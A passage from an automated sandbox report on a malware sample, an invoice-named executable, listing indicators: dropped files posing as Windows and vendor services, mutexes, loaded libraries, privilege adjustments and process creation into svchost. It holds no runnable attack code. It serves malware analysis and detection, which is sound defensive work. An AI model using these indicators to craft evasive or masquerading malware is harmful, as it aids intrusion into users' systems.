          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5FDC017_2_03C5FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C43D4017_2_03C43D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF1D5A17_2_03CF1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF7D7317_2_03CF7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFFCF217_2_03CFFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB9C3217_2_03CB9C32
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015D2D4018_2_015D2D40
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015A79F018_2_015A79F0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015CA81018_2_015CA810
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015A7C0018_2_015A7C00
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015C93B018_2_015C93B0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015CEEB018_2_015CEEB0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015C92A018_2_015C92A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: String function: 00407DE1 appears 35 times
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: String function: 00428900 appears 41 times
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: String function: 00420AE3 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 277 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 111 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
          Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
          Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1323479271.00000000041E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1324696202.0000000004E2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1284308466.0000000004140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1325665290.0000000004C83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1257110532.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1262204155.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs INV_NE_02_2034388.exe
          Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
          Source: INV_NE_02_2034388.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: INV_NE_02_2034388.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: INV_NE_02_2034388.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@9/14@7/2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00BACBD0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Users\user\AppData\Roaming\7c03ee2ee2c8fb2a.binJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7c03ee2ee2c8fb2a9e7986a9-b
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7c03ee2ee2c8fb2a-inf
          Source: C:\Windows\System32\AppVClient.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-7c03ee2ee2c8fb2a9ea72c54-b
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut1551.tmpJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: INV_NE_02_2034388.exeReversingLabs: Detection: 81%
          Source: unknownProcess created: C:\Users\user\Desktop\INV_NE_02_2034388.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
          Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
          Source: INV_NE_02_2034388.exeStatic file information: File size 1790464 > 1048576
          Source: INV_NE_02_2034388.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1257051766.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: PresentationFontCache.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr
          Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: msdtc.exe.0.drStatic PE information: real checksum: 0x2f054 should be: 0x198b5f
          Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
          Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
          Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
          Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
          Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
          Source: maintenanceservice.exe.0.drStatic PE information: section name: .00cfg
          Source: maintenanceservice.exe.0.drStatic PE information: section name: .voltbl
          Source: maintenanceservice.exe.0.drStatic PE information: section name: _RDATA
          Source: msdtc.exe.0.drStatic PE information: section name: .didat
          Source: armsvc.exe.0.drStatic PE information: section name: .didat
          Source: alg.exe.0.drStatic PE information: section name: .didat
          Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
          Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
          Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
          Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
          Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
          Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8B180 push 00B8B0CAh; ret 0_2_00B8B061
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8B180 push 00B8B30Dh; ret 0_2_00B8B1E6
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8B180 push 00B8B2F2h; ret 0_2_00B8B262
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8B180 push 00B8B255h; ret 0_2_00B8B2ED
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8B180 push 00B8B2D0h; ret 0_2_00B8B346
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8B180 push 00B8B37Fh; ret 0_2_00B8B3B7
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B8520C push 00B8528Fh; ret 0_2_00B8522D
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA852Eh; ret 0_2_00BA7F3A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8514h; ret 0_2_00BA7F66
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA7E66h; ret 0_2_00BA8057
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA817Ah; ret 0_2_00BA808B
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA82E5h; ret 0_2_00BA80D9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA826Ah; ret 0_2_00BA819E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA849Ch; ret 0_2_00BA81E4
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8321h; ret 0_2_00BA82E0
